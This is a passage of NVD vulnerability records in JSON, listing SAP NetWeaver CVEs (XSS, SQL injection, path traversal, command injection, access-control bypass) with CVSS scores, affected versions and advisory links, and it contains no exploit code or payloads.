"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2015-06-24T14:59:09.033",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/133515/SAP-NetWeaver-AS-FKCDBFTRACE-ABAP-Hardcoded-Credentials.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/133516/SAP-NetWeaver-AS-LSCT1I13-ABAP-Hardcoded-Credentials.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://scn.sap.com/community/security/blog/2015/06/11/sap-security-notes-june-2015"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/75165"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-15-015-sap-netweaver-hardcoded-credentials/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-15-016-sap-netweaver-hardcoded-credentials/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/133515/SAP-NetWeaver-AS-FKCDBFTRACE-ABAP-Hardcoded-Credentials.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/133516/SAP-NetWeaver-AS-LSCT1I13-ABAP-Hardcoded-Credentials.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://scn.sap.com/community/security/blog/2015/06/11/sap-security-notes-june-2015"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/75165"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-15-015-sap-netweaver-hardcoded-credentials/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-15-016-sap-netweaver-hardcoded-credentials/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-255"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-01-15 20:59
Modified
2024-11-21 02:47
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to the (1) Runtime Workbench (RWB) or (2) Pmitest servlet in the Process Monitoring Infrastructure (PMI), aka SAP Security Notes 2206793 and 2234918.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to the (1) Runtime Workbench (RWB) or (2) Pmitest servlet in the Process Monitoring Infrastructure (PMI), aka SAP Security Notes 2206793 and 2234918."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de XSS en SAP NetWeaver 7.4 permiten a atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a trav\u00e9s de vectores relacionados con el (1) Runtime Workbench (RWB) o (2) Pmitest servlet en el Process Monitoring Infrastructure (PMI), vulnerabilidad tambi\u00e9n tambi\u00e9n conocida como SAP Security Notes 2206793 y 2234918."
}
],
"id": "CVE-2016-1911",
"lastModified": "2024-11-21T02:47:20.237",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-01-15T20:59:02.957",
"references": [
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2016/Apr/58"
},
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2016/Apr/64"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-16-001-xss-sap-netweaver-7-4-mdt-servlet/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-16-004-sap-netweaver-7-4-pmitest-servlet-xss/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2016/Apr/58"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2016/Apr/64"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-16-001-xss-sap-netweaver-7-4-mdt-servlet/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-16-004-sap-netweaver-7-4-pmitest-servlet-xss/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-03-10 21:15
Modified
2024-11-21 05:35
Severity ?
Summary
SAP NetWeaver UDDI Server (Services Registry), versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing 'traverse to parent directory' are passed through to the file APIs, leading to Path Traversal.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2806198 | Permissions Required | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2806198 | Permissions Required | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.11:*:*:*:*:*:*:*",
"matchCriteriaId": "21A3F6A8-B060-48CE-841F-698F8F779191",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"matchCriteriaId": "53B11A3B-C559-428C-8946-7FD9FFBFA1BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver UDDI Server (Services Registry), versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \u0027traverse to parent directory\u0027 are passed through to the file APIs, leading to Path Traversal."
},
{
"lang": "es",
"value": "SAP NetWeaver UDDI Server (Services Registry), versiones 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; permite a un atacante explotar la comprobaci\u00f3n insuficiente de la informaci\u00f3n de la ruta proporcionada por los usuarios, as\u00ed, los caracteres que representan \"traverse to parent directory\" son pasados a las API de archivo, conllevando a un Salto de Ruta."
}
],
"id": "CVE-2020-6203",
"lastModified": "2024-11-21T05:35:17.523",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"source": "cna@sap.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-03-10T21:15:14.417",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/2806198"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/2806198"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-10-13 14:59
Modified
2024-11-21 02:50
Severity ?
Summary
SAP Netweaver 7.4 allows remote authenticated users to bypass an intended Unified Connectivity (UCON) access control list and execute arbitrary Remote Function Modules (RFM) by leveraging a connection created from earlier execution of an anonymous RFM included in a Communication Assembly, aka SAP Security Note 2139366.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP Netweaver 7.4 allows remote authenticated users to bypass an intended Unified Connectivity (UCON) access control list and execute arbitrary Remote Function Modules (RFM) by leveraging a connection created from earlier execution of an anonymous RFM included in a Communication Assembly, aka SAP Security Note 2139366."
},
{
"lang": "es",
"value": "SAP Netweaver 7.4 permite a usuarios remotos autenticados eludir una lista de control de acceso Unified Connectivity (UCON) intencionada y ejecutar Remote Function Modules (RFM) arbitrarios aprovechando una conexi\u00f3n creada por una ejecuci\u00f3n anterior de un RFM an\u00f3nimo incluido en una Communication Assembly, vulnerabilidad tambi\u00e9n conocida como SAP Security Note 2139366."
}
],
"id": "CVE-2016-3635",
"lastModified": "2024-11-21T02:50:25.990",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-10-13T14:59:00.220",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/48"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/93501"
},
{
"source": "cve@mitre.org",
"tags": [
"Permissions Required"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/48"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/93501"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-284"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-09-12 13:31
Modified
2024-11-21 01:58
Severity ?
Summary
SQL injection vulnerability in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to "ABAD0_DELETE_DERIVATION_TABLE."
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SQL injection vulnerability in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to \"ABAD0_DELETE_DERIVATION_TABLE.\""
},
{
"lang": "es",
"value": "Vulnerabilidad de inyecci\u00f3n SQL en SAP NetWeaver 7.30 permite a atacantes remotos ejecutar comandos SQL arbitrarios a trav\u00e9s de vectores sin especificar, relacionado con \"ABAD0_DELETE_DERIVATION_TABLE.\""
}
],
"id": "CVE-2013-5723",
"lastModified": "2024-11-21T01:58:01.010",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-09-12T13:31:15.587",
"references": [
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/96900"
},
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/54702"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/62147"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id/1029018"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/dsecrg-13-016-sap-netweaver-abad0_delete_derivation_table/"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1840249"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/96900"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/54702"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/62147"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id/1029018"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/dsecrg-13-016-sap-netweaver-abad0_delete_derivation_table/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1840249"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-10-05 16:59
Modified
2024-11-21 02:58
Severity ?
Summary
The (1) SCTC_REFRESH_EXPORT_TAB_COMP, (2) SCTC_REFRESH_CHECK_ENV, and (3) SCTC_TMS_MAINTAIN_ALOG functions in the SCTC subpackage in SAP Netweaver 7.40 SP 12 allow remote authenticated users with certain permissions to execute arbitrary commands via vectors involving a CALL 'SYSTEM' statement, aka SAP Security Note 2260344.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:sp12:*:*:*:*:*:*",
"matchCriteriaId": "DBCD6DEE-C43F-4244-AFBD-BE77A34E7B0C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The (1) SCTC_REFRESH_EXPORT_TAB_COMP, (2) SCTC_REFRESH_CHECK_ENV, and (3) SCTC_TMS_MAINTAIN_ALOG functions in the SCTC subpackage in SAP Netweaver 7.40 SP 12 allow remote authenticated users with certain permissions to execute arbitrary commands via vectors involving a CALL \u0027SYSTEM\u0027 statement, aka SAP Security Note 2260344."
},
{
"lang": "es",
"value": "Las funciones (1) SCTC_REFRESH_EXPORT_TAB_COMP, (2) SCTC_REFRESH_CHECK_ENV y (3) SCTC_TMS_MAINTAIN_ALOG en el subpaquete SCTC en SAP Netweaver 7.40 SP 12 permiten a usuarios remotos autenticados con ciertos permisos ejecutar comandos arbitrarios a trav\u00e9s de vectores relacionados con una sentencia CALL \u0027SYSTEM\u0027, vulnerabilidad tambi\u00e9n conocida como SAP Security Note 2260344."
}
],
"id": "CVE-2016-7435",
"lastModified": "2024-11-21T02:58:00.373",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-10-05T16:59:06.807",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/0"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/1"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/2"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/93272"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-march-2016"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshcheckenv"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshexporttabcomp"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctctmsmaintainalog"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/93272"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-march-2016"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshcheckenv"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshexporttabcomp"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctctmsmaintainalog"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2011-12-08 19:55
Modified
2024-11-21 01:32
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5007E3B7-3C36-4256-9E01-51C6F52FD0FF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de ejecuci\u00f3n de secuencias de comandos en sitios cruzados en el Virus Scan Interface en SAP Netweaver, permite a usuarios remotos inyectar secuencias de comandos web o HTML a trav\u00e9s de los par\u00e1metros (1) instname en el servlet VsiTestScan y (2) name en el servlet VsiTestServlet."
}
],
"id": "CVE-2011-4707",
"lastModified": "2024-11-21T01:32:49.703",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2011-12-08T19:55:03.720",
"references": [
{
"source": "cve@mitre.org",
"url": "http://dsecrg.com/pages/vul/show.php?id=336"
},
{
"source": "cve@mitre.org",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/520554/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1546307"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://dsecrg.com/pages/vul/show.php?id=336"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/520554/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1546307"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-01-15 20:59
Modified
2024-11-21 02:47
Severity ?
Summary
The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
